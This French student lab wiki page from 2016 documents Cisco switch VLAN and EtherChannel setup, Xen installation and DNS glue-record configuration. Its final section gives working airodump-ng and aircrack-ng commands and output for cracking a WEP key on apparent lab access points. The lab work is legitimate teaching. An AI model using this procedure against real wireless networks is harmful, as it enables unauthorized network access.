Cahier 2016 groupe n°7 : Différence entre versions
(→Serveur DNS et DNSSEC avec bind) |
|||
Ligne 60 : | Ligne 60 : | ||
===Serveur DNS et DNSSEC avec bind=== | ===Serveur DNS et DNSSEC avec bind=== | ||
+ | |||
+ | La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi. | ||
+ | Il faut alors se diriger sur la rubrique :''Gérer les Glue records''. | ||
+ | A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine : | ||
+ | |||
+ | '''nom du serveur''' : ns.bielloumutherfucker.space | ||
+ | |||
+ | '''IP''' : 193.48.57.167 | ||
+ | |||
+ | On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' : | ||
+ | |||
+ | '''DNS1''' : ns.bielloumutherfucker.space | ||
+ | |||
+ | '''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi) | ||
+ | |||
+ | ... | ||
===Crackage de clé WEP=== | ===Crackage de clé WEP=== |
Version du 7 novembre 2016 à 11:19
Sommaire
Cahier des charges
Mise en réseau des commutateurs 6006 en E304
Avancement du travail
Configuration du 6006
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :
1 Switch-E304>enable 2 Switch-E304#vlan database 3 Switch-E304(vlan)#vlan x name nameX 4 Switch-E304(vlan)#exit
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :
1 Switch-E304>enable 2 Switch-E304#conf t 3 Switch-E304(config)#interface GigabitEthernet 4/x 4 Switch-E304(config-if)#switchport 5 Switch-E304(config-if)#switchport access vlan x 6 Switch-E304(config-if)#no shutdown 7 Switch-E304(config-if)#end 8 Switch-E304#write memory (enregistrer la configuration)
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :
5 Switch-E304(config-if)#switchport mode trunk
Installation de xen
xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --dir=/usr/local/xen --gateway=193.48.57.172
Configuration d'une EtherChannel
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.
Voici la commande à rentrer dans l'interface de configuration du commutateur :
1 Switch-E304>enable 2 Switch-E304#conf t 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32 4 Switch-E304(config-if)#switchport 5 Switch-E304(config-if)#switchport mode trunk 6 Switch-E304(config-if)#channel-protocol lacp 7 Switch-E304(config-if)#channel-group 1 mode passive 8 Switch-E304(config-if)#no shutdown 9 Switch-E304(config-if)#end 10 Switch-E304#write memory (enregistrer la configuration)
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.
Serveur DNS et DNSSEC avec bind
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi. Il faut alors se diriger sur la rubrique :Gérer les Glue records. A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :
nom du serveur : ns.bielloumutherfucker.space
IP : 193.48.57.167
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique modifier les serveurs DNS :
DNS1 : ns.bielloumutherfucker.space
DNS2 : ns6.gandi.net (serveur secondaire de Gandi)
...
Crackage de clé WEP
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2
On obtient l'écran suivant :
CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:CF:01:94 -74 0 0 0 -1 -1 PolytechLille 04:DA:D2:9C:50:57 -62 1 6 2 2 54e. WEP WEP cracotte08 04:DA:D2:9C:50:56 -67 2 0 0 2 54e. WEP WEP cracotte07 04:DA:D2:9C:50:54 -66 1 5 2 2 54e. WEP WEP cracotte05 04:DA:D2:9C:50:52 -63 1 80 38 2 54e. WEP WEP cracotte03 04:DA:D2:9C:50:53 -61 0 24 11 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:55 -68 1 14 6 2 54e. WEP WEP cracotte06 04:DA:D2:9C:50:50 -60 0 73 35 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:51 -63 1 52 25 2 54e. WEP WEP cracotte02 44:AD:D9:5F:87:00 -42 3 1 0 3 54e. WEP WEP40 Wolverine BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:CF:01:94 00:0C:E7:91:C1:7D -56 1e- 1e 0 13 04:DA:D2:9C:50:57 00:0F:B5:92:22:66 -68 54e-11e 15 5 04:DA:D2:9C:50:54 00:0F:B5:92:23:74 -72 36e- 5e 0 7 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -60 54e-48e 79 81 04:DA:D2:9C:50:53 00:0F:B5:92:22:68 -64 48e-54e 111 24 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -66 0 -48e 128 13 04:DA:D2:9C:50:50 00:0F:B5:92:23:75 -62 54e-54e 92 75 04:DA:D2:9C:50:51 00:0F:B5:92:24:51 -60 48e-48e 63 53 (not associated) 9C:2A:83:45:F0:2D -80 0 - 1 0 1 (not associated) 8A:1B:9C:B1:EC:8C -70 0 - 1 5 2 44:AD:D9:5F:87:00 AC:5F:3E:59:90:D5 -40 0 - 1 0 2
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :
airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2
On obtient l'écran suivant :
CH 2 ][ Elapsed: 8 s ][ 2016-03-31 20:30 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:55 -64 0 59 770 64 2 54e. WEP WEP cracotte06 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -68 6e-54e 5108 718
Une fois le fichier de capture créé, nous avons exécuter la commande
aircrack cracotte06-01.cap
afin débuter le crackage de la clé WEP.
On obtient le résultat suivant en quelques minutes :
[00:01:53] Tested 279622 keys (got 31535 IVs)
KB depth byte(vote) 0 0/ 1 EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) 1 0/ 1 EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) 2 0/ 1 EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) 3 0/ 1 EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) 4 0/ 1 EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) 5 0/ 1 EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) 6 0/ 1 EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) 7 0/ 2 EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) 8 0/ 1 EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) 9 0/ 3 7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) 10 0/ 1 D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) 11 1/ 1 A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) 12 0/ 1 44(43740) 35(38548) A7(38252) 3A(37560) 88(37560)
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ]
Decrypted correctly: 100%
La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44"